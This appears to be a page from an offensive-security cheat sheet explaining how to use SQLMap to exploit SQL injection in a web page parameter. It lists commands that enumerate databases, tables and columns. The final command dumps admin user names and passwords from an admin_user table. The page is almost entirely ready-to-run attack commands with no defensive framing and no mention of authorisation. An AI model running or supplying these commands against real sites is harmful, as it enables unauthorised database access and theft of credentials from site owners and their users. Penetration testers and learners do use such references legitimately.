SQLMap

Basic Flow of SQLMap is as follows:
• Enumerate database information such as name, version, other details,
• Select a particular database to enumerate tables,
• Select tables and enumerate columns,
• Select columns and enumerate rows to extract data,
• Further exploitation if required.
 
# Enumerate the database
sqlmap.py -u “http://www.example.com/news.php?id=11” --dbs
# -u: defines the Target URL.
# --dbs: will attempt to pull up the website databases and if you simply want to check whether the site is vulnerable to SQL Injection or not then you can simply neglect the (–dbs) parameter.

# Enumerate the tables
sqlmap -u “Your Target URL” -D (choose a database) –tables

# Enumerate the columns
sqlmap.py -u “Your Target URL” -D (the database you chose) -T (choose a table) --columns

# Extract the data from the columns
sqlmap -u “http://www.example.com/news.php?id=11” -D db363851433 -T admin_user -C admin_user_name,admin_pass --dump
PreviousEmpire Nextmsfvenon
Last updated 4 years ago